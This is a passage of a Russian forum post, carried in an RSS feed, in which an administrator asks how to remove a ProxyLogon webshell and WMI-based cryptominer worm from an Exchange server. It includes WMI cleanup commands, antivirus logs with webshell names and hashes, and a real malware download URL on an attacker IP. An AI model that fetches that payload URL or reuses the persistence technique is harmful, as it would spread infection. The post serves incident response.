-filter &quot;Name= 'SCM Event Log Filter'&quot; | Remove-WMIObject &nbsp;-Verbose<br /><li>Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter &quot;Name='SCM Events Log Consumer'&quot; |Remove-WMIObject -Verbose<br /><li>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter &quot;Name= 'SCM Event Log Filter2'&quot; | Remove-WMIObject &nbsp;-Verbose<br /><li>Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter &quot;Name='SCM Events Log Consumer2'&quot; |Remove-WMIObject -Verbose<br /></ul>Планирую эти команды прокатать на всех хостах организации, для душевного спокойствия.<br /><br /><B>4. Описание и вопрос по лечению &quot;ворот&quot; атаки (почтовый сервер)</B><br /><br />Остался ключевой момент - почтовый сервер, с которого предположительно всё началось и на котором до сих пор сидит зловред. <br />Машина с Windows Server 2012r2 Exchange 2013 (version 15.0 (build 1497.2)).<br />Установлен Каspersky Security for Windows Server, на днях установили мартовский патч безопасности Exchange Server 2013 Cumulative Update 23.<br />Казалось бы, уязвимость закрыта и можно выдохнуть.<br />Но нет.<br /><br />Касперский в журнале безопасности каждые три часа пишет о семи файлах-вредоносах - &nbsp;одна dll, семь aspx.<br />При запуске быстрой проверки или полной проверки антивирус их не находит.<br />И команда PowerShell их не находит.<br />Из чего можно предположить, что они по команде/расписанию возникают, а в процессе активности их гасит антивирус.<br />Значит, их команда на их &quot;зарождение&quot; прописана где-то в системе.<br /><br />В рамках диагностики на почтовике скачали и запустили скрипт, который ищет в логах события с потенциальным пробивом и левые записи в конфигурации, которые могут быть этим источником создания вредоносных файлов.<br /><br /><noindex><a href="https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1" target="_blank" rel="nofollow">https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1</a></noindex> <br />Команда:<br /><I>.\Test-ProxyLogon.ps1 -OutPath $home\desktop\logs\</I><br />Результат команды:<br /><span class="bx-font" style="color:#ff0000">&#91;CVE-2021-26855&#93; Suspicious activity found in Http Proxy log </span><br /><br />Получается, что либо патч уязвимость не закрыл, либо встал криво, либо я не знаю что.<br />Еще из странностей, связанных с почтовиком:<br /><ol><li>Несостыковка номера версии патча, установленного в системе (15.0.1497.2) с тем, который по идее должен был быть (15.01.1497.23). На сайте Микрософта указано, что версия &quot;15.0.1497.2&quot; от 18.06.2019, а &quot;15.01.1497.23&quot; - от 13.07.2021. На всякий случай вчера скачали новый файл, уже по другой ссылке Микрософт, в свойствах файла на вкладке &quot;Подробно&quot; указано &quot;Security Update for Exchange Server 2013 Cumulative Update 23 (KB5004778)15.0.1497.23. Запустили установку (не удаляя предыдущий патч), прошла без вопросов, перезагрузили - номер версии остался без изменений. Чудеса в решете.<br /><li>Не запускается оснастка Exchange Toolbox. Пишет &quot;Консоль управленич (MMC) обнаружила ошибку оснастки, поэтому оснастка будет выгружена&quot;, следующее окно &quot;Необрабатывемое исключение в оснастке управляемого...&quot; Очистка кэша оснастки (AppData\Roaming\Microsoft\MMC\Exchange Toolbox) не помогает.<br /></ol><B>А теперь, собственно, суть обращения: как забороть зловреда на почтовике? <br /></B>Что-то я упускаю из вида, а что - непонятно.<br />Заранее благодарю.<br /><br />Сообщения о детектах из Журнала Касперского с почтового сервера:<br /><br /><I>Обнаружен возможно зараженный объект: Троянская программа HEUR:Backdoor.MSIL.Webshell.gen.</I><br /><I>Имя объекта: App_Web_r0zdr.aspx.f5dba9b9.d7wo2roq.dll </I><br /><I>MD5 хеш файла: e91aa8fb8225d5e019311d67774f1946</I><br /><I>Хеш SHA256 файла: e3614efab364abe01dd98d92e61d6a73decc9ad87e9d6ce14059581e4ca4<WBR/>&shy;ccc2</I><br /><br /><I>Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.</I><br /><I>Имя объекта: log.aspx </I><br /><I>MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f</I><br /><I>Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a854<WBR/>&shy;30eb</I><br /><br /><I>Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.</I><br /><I>Имя объекта: RXT7WB.aspx </I><br /><I>MD5 хеш файла: c2b67fb32ef0953722ea437295be386b</I><br /><I>Хеш SHA256 файла: b4d02ac0e79ca6376416f52c30a82d8b72efcb8966640f3dbf5b22f67e60<WBR/>&shy;75b9</I><br /><br /><I>Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.</I><br /><I>Имя объекта: dgFfuh.aspx </I><br /><I>MD5 хеш файла: 0418b10fdf926066fa6a19e83332e34e</I><br /><I>Хеш SHA256 файла: 59720c4ae289ab2a8336a1cd24fbfb2a24478e1ed88d517725999751e510<WBR/>&shy;b97a</I><br /><br /><I>Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.</I><br /><I>Имя объекта: 7r3q2.aspx </I><br /><I>MD5 хеш файла: dbb0576553870e07f8220386b5989cdb</I><br /><I>Хеш SHA256 файла: 6377ada51e66550bafda31038897ed13be71f928dabbefd657a1d3b8be67<WBR/>&shy;2237</I><br /><br /><I>Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.</I><br /><I>Имя объекта: log.aspx </I><br /><I>MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f</I><br /><I>Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a854<WBR/>&shy;30eb</I><br /><br /><B>5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин</B><br /><br />Злоумышленники активно эксплуатируют уязвимости в MS Exchange<br /><noindex><a href="https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/" target="_blank" rel="nofollow">https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/</a></noindex><br /><br />Handling a distributed cryptominer AD worm<br /><noindex><a href="https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/" target="_blank" rel="nofollow">https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/</a></noindex><br /><br />Далее привожу примеры из журналов безопасности антивирусов в качестве дополнительной информации и для индексации поисковых систем, т.к. в процессе поиска причин и вариантов решения я внятного алгоритма решения не нашел. Возможно найденные варианты решения окажутся полезными кому-нибудь еще.<br /><br />Если на зараженной машине, на которой не стоит антивирус, запустить DrWeb CureIT, то обнаруживаются обычно следующие угрозы (пример с конкретной машины):<br /><br /><I>Объект: powershell.exe</I><br /><I>Угроза: PowerShellDownLoader.1452</I><br /><I>Путь: \Process\4288\Device\HarddiskVolume2\Windows\System32\Window<WBR/>&shy;sPoweShell\v1.0\powershell.exe</I><br /><br /><I>Объект: CommandLineTemplate</I><br /><I>Угроза: PowerShellMulDrop.129</I><br /><I>Путь: \WMI\root\subscription\CommandLineEventConsumer{266c72e5-62e8-11d1-ad89-00c04fd8fdff}\CommandLineTemplate</I><br /><br />powershell.exe может быть несколько, CommandLineTemplate обычно один.<br />После пролечивания утилитой DrWeb CureIT &quot;паразитные&quot; процессы исчезают, но через какое-то время снова происходит заражение и последующая загрузка мощностей машины.<br /><br />В рамках борьбы с заражением на сервера установлены Каspersky Security for Windows Server 11.0.1.897<br />После установки, активации, обновления баз и включения KSN запускалась &quot;Проверка важных областей&quot; с настройками &quot;по умолчанию&quot; (Действия над зараженными и другими обнаруженными объектами: Выполнять рекомендуемое действие).<br />Находилось следующее:<br /><br /><I>Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunSvc.ksws.</I><br /><I>Имя объекта: WMIService:BVMFJGIVCEOAWSUOYQTH </I><br /><br />После последующей перезагрузки сервера в диспетчере задач всё выглядит прилично и &quot;лишние&quot; процессы не грузят систему.<br />Но в &quot;Событиях&quot; задачи &quot;Постоянная защита файлов&quot; постоянно появляются блоки новых записей с пометкой &quot;Уровень важности: Критический&quot;.<br /><br />Блок сообщений с одного из серверов:<br /><br /><I>Время: 26.08.2021 2:06:54</I><br /><I>Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.</I><br /><I>Имя объекта: WMI-Consumer:SCM Event8 Log Consumer </I><br /><br /><I>Время: 26.08.2021 2:06:55</I><br /><I>Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.</I><br /><I>Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2 </I><br /><br /><I>Время: 26.08.2021 2:50:51</I><br /><I>Обнаружен веб-адрес. &nbsp; &nbsp;.</I><br /><I>Имя объекта: </I><noindex><a href="http://45.10.69.139:8000/in6.ps1" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/in6.ps1</I></a></noindex><br /><I>Компьютер: network</I><br /><I>Пользователь: KR-TERM\Администратор</I><br /><I>Имя процесса: wmiprvse.exe</I><br /><br /><I>Время: 26.08.2021 6:55:28</I><br /><I>Обнаружен веб-адрес. &nbsp; &nbsp;.</I><br /><I>Имя объекта: </I><noindex><a href="http://45.10.69.139:8000/in6.ps1" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/in6.ps1</I></a></noindex><I> </I><br /><I>Компьютер: network</I><br /><I>Пользователь: KR-TERM\Администратор</I><br /><I>Имя процесса: wmiprvse.exe</I><br /><br />На других серверах дополнительно появлялись сообщения с другими пользователями и процессом:<br /><br /><I>Обнаружен веб-адрес. &nbsp; &nbsp;.</I><br /><I>Имя объекта: </I><noindex><a href="http://45.10.69.139:8000/in6.ps1" target="_blank" rel="nofollow"><I>http://45.10.69.139:8000/in6.ps1</I></a></noindex><br /><I>Компьютер: localhost</I><br /><I>Пользователь: WORKGROUP\FIL-T2$</I><br /><I>Имя процесса: services.exe</I><br /><br /><I>Процесс терминирован: обнаружена попытка эксплуатации уязвимости. Причина: в защищаемом процессе другой процесс создал поток управления.</I><br /><I>Имя объекта: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</I><br /><I>Компьютер: VIRTUALMACHINE</I><br /><I>Пользователь: VIRTUALMACHINE\Администратор</I><br /><I>Имя процесса: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</I><br /><br /><I>Обнаружен объект: Троянская программа Trojan.Win32.Shelma.arzd.</I><br /><I>Имя объекта: C:\Windows\System32\mue.exe </I><br /><I>MD5 хеш файла: d1aed5a1726d278d521d320d082c3e1e</I><br /><I>Хеш SHA256 файла: 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2<WBR/>&shy;edff</I><br /><I>Компьютер: network</I><br /><I>Пользователь: VIRTUALMACHINE\Администратор</I> <br />
			<i>04.09.2021 15:05:23, Mr Burila.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16547/message113033/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16547/message113033/</guid>
			<pubDate>Sat, 04 Sep 2021 15:05:23 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
